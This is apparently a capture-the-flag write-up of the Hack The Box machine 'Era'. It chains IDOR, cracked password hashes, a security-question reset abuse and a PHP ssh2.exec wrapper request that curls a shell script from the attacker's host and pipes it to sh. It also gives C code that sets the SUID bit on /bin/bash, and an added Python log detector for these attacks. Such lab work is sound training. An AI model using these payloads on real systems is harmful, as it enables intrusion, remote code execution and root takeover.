Era HTB Write Up

1. Target Information
IP Machine: 10.10.11.79
Domain: era.htb
2. Initial Reconnaissance
2.1 Port Scanning


2.2 Host Enumeration
First I will enumerate the website. The domain era.htb has to be added to /etc/hosts, which I do with this one-liner.
Now let's take a look at the website.
Every button redirects to the same page, so there is nothing here; let's enumerate subdomains next.

3. Web Enumeration
3.1 Subdomain Discovery
To enumerate subdomains I used gobuster.
gobuster vhost -u http://era.htb/ -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain -t 100
Here we can see that file.era.htb is a valid subdomain, so let's add it to /etc/hosts as well.

Let's take a look at this website. It offers several options, one of them a file upload feature, but all of them require authentication and I have no valid credentials.

3.2 Website Content Discovery
So let's move on; here I ran gobuster to enumerate the website's content.
The enumeration found a valid file, register.php, so let's register and log in to the website.

3.3 User Registration and Login
Here I registered.

And here I logged in.

4. File Upload Functionality
4.1 Attempting Malicious Uploads
I will start by uploading a malicious PHP file to see what happens.

After the upload, the site returns a unique ID for the file.

4.2 IDOR to Discover Other Files
I will try a minimal IDOR: I intercept the request http://file.era.htb/download.php?id=9430 and fuzz the id parameter with Burp Intruder.

Looking at the content length, two IDs return a different length, which means they are valid. Let's see what they are.

The first ID gives a .zip called signing.

The other one seems to be a full backup of the site.

5. Looting Sensitive Files
5.1 Downloading and Extracting Backups
Once I unzipped both zips, these are their contents.


We can see there is a sqlite3 file, so let's take a look at it.

5.2 SQLite Database Analysis
In this database we can see several users and password hashes, so I will attempt to crack the hashes with hashcat.
This is my hashes.txt file.

5.3 Cracking User Hashes
To crack them I used this command.
And it cracked two passwords.

6. FTP Access
6.1 Valid User Discovery
Now with netexec I will check which users are valid with these passwords against the FTP service.

Only yuri is valid, so let's log in to FTP.
6.2 Downloading FTP Content
Here there are two folders.

With mget * I retrieved all of the content to my machine.
For now I will focus on getting an initial shell and come back to the FTP files later.
7. Privilege Escalation via Web App
7.1 Abuse of Security Questions Reset Function
After enumerating the website for a while I found reset.php. Here we can abuse it to reset the admin's security questions and then log in as admin.

As long as we know the username, this works for every user: we can reset anyone's security questions.

7.2 Logging in as Admin
Now at this endpoint we can log in by answering the security questions we just set.

And we are admin.
7.3 File Upload and Intercepting Request
Now we go back to the website, upload a file as admin, and intercept the request with Burp Suite.
If we look at download.php we can see there are two parameters.

8. Gaining Initial Shell
8.1 SSRF with PHP Wrappers for Remote Code Execution
To get a reverse shell I will try to abuse PHP wrappers.
This works because the format parameter leads to an SSRF, so with PHP wrappers we can use ssh2.exec to log in via SSH, run a curl against our malicious resource and execute it with bash.
This is the content of shell.sh.
I send the following request from Burp Suite:
GET /download.php?id=8132&show=true&format=ssh2.exec://yuri:mustang@127.0.0.1/curl+-s+10.10.XX.XX/shell.sh|sh; HTTP/1.1
Host: file.era.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=8l4et0hjhnlnhc0p39skjqvqbi
Upgrade-Insecure-Requests: 1
Priority: u=0, i
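As an added defender-side example (not part of this write-up), the following Python runs two detections over constructed access-log lines: the id fuzzing against download.php described in 4.2, and a format parameter carrying a stream-wrapper scheme as in the ssh2.exec request above. The log lines, client IPs and the enumeration threshold are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample in Apache combined-log style; not traffic from the box.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Aug/2025:10:00:01 +0000] "GET /download.php?id=9430 HTTP/1.1" 200 512
10.10.14.5 - - [01/Aug/2025:10:00:02 +0000] "GET /download.php?id=9431 HTTP/1.1" 200 512
10.10.14.5 - - [01/Aug/2025:10:00:02 +0000] "GET /download.php?id=9432 HTTP/1.1" 200 512
10.10.14.5 - - [01/Aug/2025:10:00:03 +0000] "GET /download.php?id=9433 HTTP/1.1" 200 512
10.10.14.5 - - [01/Aug/2025:10:00:03 +0000] "GET /download.php?id=9434 HTTP/1.1" 200 512
10.10.14.9 - - [01/Aug/2025:10:05:00 +0000] "GET /download.php?id=8132&show=true&format=ssh2.exec://u:p@127.0.0.1/id HTTP/1.1" 200 88
10.10.14.7 - - [01/Aug/2025:10:06:00 +0000] "GET /download.php?id=8132&show=true&format=raw HTTP/1.1" 200 88
"""

# client, method, request target and status code from one combined-log line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# a value starting with a URL scheme is a stream wrapper, never a plain format name
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)

def parse_line(line):
    """Return {ip, path, query, status} for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, _method, target, status = m.groups()
    parts = urlsplit(target)
    return {"ip": ip, "path": parts.path, "query": parse_qs(parts.query), "status": int(status)}

def detect(log_text, id_threshold=5):
    """Return (rule, client_ip, detail) findings: id_enumeration when one client
    requested at least id_threshold distinct ids, wrapper_in_format when the
    format parameter carried a scheme such as ssh2.exec://."""
    ids_by_ip = defaultdict(set)
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"] != "/download.php":
            continue
        for fid in rec["query"].get("id", []):
            ids_by_ip[rec["ip"]].add(fid)
        for fmt in rec["query"].get("format", []):
            if SCHEME_RE.match(fmt):
                findings.append(("wrapper_in_format", rec["ip"], fmt.split("://", 1)[0]))
    for ip, ids in sorted(ids_by_ip.items()):
        if len(ids) >= id_threshold:
            findings.append(("id_enumeration", ip, len(ids)))
    return findings
```

Allow-listing the format values server-side removes the wrapper vector entirely; the log rule is the check for whether it was ever tried.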
8.2 Reverse Shell as yuri
We get a reverse shell as yuri.


9. Lateral Movement
9.1 Password Reuse for eric
Now I will attempt password spraying with the previously cracked password, america.
9.2 Accessing User Flag
I tried it as eric and it worked. The flag can be read with cat /home/eric/user.txt

10. Root Privilege Escalation
10.1 Abusing Group Permissions on Binary
For root, after enumerating for a while I found the following folder. We can modify this binary because eric is a member of the devs group.

10.2 Crafting a Malicious ELF
First, on my machine I created the malicious C file with the following content.
#include <unistd.h>

/* Replacement binary: when run by root it sets the SUID bit on /bin/bash */
int main(void) {
    char *args[] = {"/bin/bash", "-c", "chmod u+s /bin/bash", NULL};
    execve("/bin/bash", args, NULL);
    return 0; /* only reached if execve fails */
}
And I will compile it.
10.3 Signing with Custom Signer
Then we need to use this GitHub script to sign the binary, because it has to be signed to be accepted.
NUAA-WatchDog Linux ELF Binary Signer
We can sign our malicious binary like this.

10.4 Overwriting Binary and Triggering SUID Shell
Now, as eric, we run the following command to replace the binary with our malicious one.
Once it is in place, if we wait a little, /bin/bash will have the SUID bit set.

11. Root Access Achieved
11.1 Executing Root Shell
And we can spawn a shell as root.

Made by Astro